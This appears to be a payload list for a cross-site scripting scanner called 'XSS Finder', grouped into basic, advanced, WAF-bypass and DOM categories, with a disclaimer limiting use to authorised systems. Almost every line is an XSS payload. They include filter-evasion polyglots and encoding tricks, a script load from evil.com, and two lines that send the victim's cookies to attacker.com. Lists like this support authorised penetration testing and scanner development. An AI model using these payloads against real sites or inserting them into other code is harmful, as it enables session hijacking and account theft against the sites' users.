# ============================================================
# XSS Finder - Payload Collection
# ============================================================
# Format:
#   Lines starting with # are comments (ignored)
#   [CATEGORY] markers switch the active category
#   Each non-empty, non-comment line is treated as a payload
#
# Categories:
#   [BASIC]      - Standard XSS payloads (alert-based)
#   [ADVANCED]   - Evasion, polyglots, complex vectors
#   [WAF_BYPASS] - Designed to bypass WAFs and filters
#   [DOM]        - DOM-based XSS sinks and sources
#
# DISCLAIMER: Use only on systems you own or have permission to test.
# ============================================================

[BASIC]
# ── Classic script-tag payloads ──────────────────────────────
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<SCRIPT>alert('XSS')</SCRIPT>
<script >alert(1)</script>
<script	>alert(1)</script>
</script><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>

# ── Image tag payloads ───────────────────────────────────────
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src="" onerror="alert(1)">
<img src='x' onerror='alert(1)'>
<IMG SRC=x ONERROR=alert(1)>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
<img src=1 onerror=alert(document.cookie)>

# ── SVG payloads ─────────────────────────────────────────────
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">
"><svg onload=alert(1)>
<svg><script>alert(1)</script></svg>

# ── Body / input event handlers ──────────────────────────────
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>

# ── Anchor / href payloads ───────────────────────────────────
<a href="javascript:alert(1)">click me</a>
<a href=javascript:alert(1)>XSS</a>
<a href="javascript:alert(document.cookie)">click</a>

# ── Iframe payloads ──────────────────────────────────────────
<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>
<iframe src="data:text/html,<script>alert(1)</script>">

[ADVANCED]
# ── Polyglot payloads (work in multiple contexts) ─────────────
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

# ── HTML5 / modern event handlers ────────────────────────────
<video src=1 onerror=alert(1)>
<audio src=x onerror=alert(1)>
<source onerror=alert(1)>
<track default onerror=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<math><mtext></table></math><img src=x onerror=alert(1)>
<table><td background="javascript:alert(1)">

# ── Attribute-breaking payloads ───────────────────────────────
" onmouseover="alert(1)
" onclick="alert(1)
" onfocus="alert(1)" autofocus="
' onmouseover='alert(1)
' onclick='alert(1)
" onerror="alert(1)" src="x
`onmouseover=alert(1) `
" onload="alert(1)" foo="
" style="x:expression(alert(1))"

# ── JavaScript context breaking ───────────────────────────────
';alert(1)//
";alert(1)//
</script><script>alert(1)</script>
\";alert(1)//
\';alert(1)//
`;alert(1)//
${alert(1)}
{{constructor.constructor('alert(1)')()}}

# ── String.fromCharCode encoding ─────────────────────────────
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

# ── eval-based payloads ───────────────────────────────────────
<script>eval('ale'+'rt(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>setTimeout('alert(1)',0)</script>
<script>setInterval('alert(1)',9999)</script>
<script>Function('alert(1)')()</script>

# ── Template literal payloads ─────────────────────────────────
<script>alert`1`</script>
<img src=x onerror=alert`1`>
<svg onload=alert`1`>

# ── URL-encoded payloads ──────────────────────────────────────
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
<a href="%6A%61%76%61%73%63%72%69%70%74%3Aalert(1)">XSS</a>

# ── Double-encoded payloads ───────────────────────────────────
%253Cscript%253Ealert(1)%253C/script%253E
%2522%253E%253Cscript%253Ealert(1)%253C/script%253E

[WAF_BYPASS]
# ── Case variation ────────────────────────────────────────────
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<sCriPt>alert(1)</scRipt>
<iMg SrC=x oNeRrOr=alert(1)>

# ── Whitespace and null-byte injection ────────────────────────
<script	>alert(1)</script>
<script\n>alert(1)</script>
<img	src=x	onerror=alert(1)>
< script >alert(1)</ script >

# ── Comment insertion ─────────────────────────────────────────
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr/**/ipt>alert(1)</scr/**/ipt>
<!--><script>alert(1)</script>
<script><!--alert(1)//--></script>

# ── Tag mangling ──────────────────────────────────────────────
<script/a>alert(1)</script>
<script ="">alert(1)</script>
<img/src=x onerror=alert(1)>
<svg/onload=alert(1)/>
<input/onfocus=alert(1) autofocus>

# ── Unicode and entity encoding ───────────────────────────────
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(1)>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
&lt;script&gt;alert(1)&lt;/script&gt;

# ── HTML5 quirks ──────────────────────────────────────────────
<script>alert(1)//
<script><!--alert(1)
<script src=//evil.com/xss.js>
<script src=data:,alert(1)>
<img src=x:x onerror=alert(1)>

# ── Filter evasion via redundant characters ───────────────────
<<script>alert(1)<</script>
<sc<script>ript>alert(1)</sc</script>ript>
<IMG """><SCRIPT>alert(1)</SCRIPT>">

# ── Protocol-based bypasses ───────────────────────────────────
<a href="jaVaScRiPt:alert(1)">click</a>
<a href="j&#97;vascript:alert(1)">click</a>
<a href="&#106;avascript:alert(1)">click</a>
<a href="java&#115;cript:alert(1)">click</a>
<a href="java script:alert(1)">click</a>

# ── CSS expression (IE legacy) ────────────────────────────────
<div style="x:expression(alert(1))">
<style>*{x:expression(alert(1))}</style>

# ── Event without quotes ──────────────────────────────────────
<img src=x onerror=alert(1) x=
<svg onload=alert(1) foo=
<body onload=alert(1) a=

[DOM]
# ── DOM sink exploitation ────────────────────────────────────
# These payloads target common DOM XSS sinks:
# innerHTML, document.write, eval, location, etc.

# document.write sinks
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
</script><img src=x onerror=alert(1)>

# innerHTML sinks
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<b onmouseover=alert(1)>XSS</b>

# location/hash-based
javascript:alert(1)
#<img src=x onerror=alert(1)>
#<script>alert(1)</script>

# eval sinks
alert(1)
};alert(1)//
');alert(1)//
");alert(1)//
`);alert(1)//

# setTimeout/setInterval
alert(1)
alert`1`

# document.cookie theft
<script>new Image().src="http://attacker.com/?c="+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">

# postMessage abuse
<script>window.postMessage('<img src=x onerror=alert(1)>','*')</script>

# window.location manipulation
<script>window.location='javascript:alert(1)'</script>

# JSON-based DOM XSS
{"key":"<script>alert(1)</script>"}
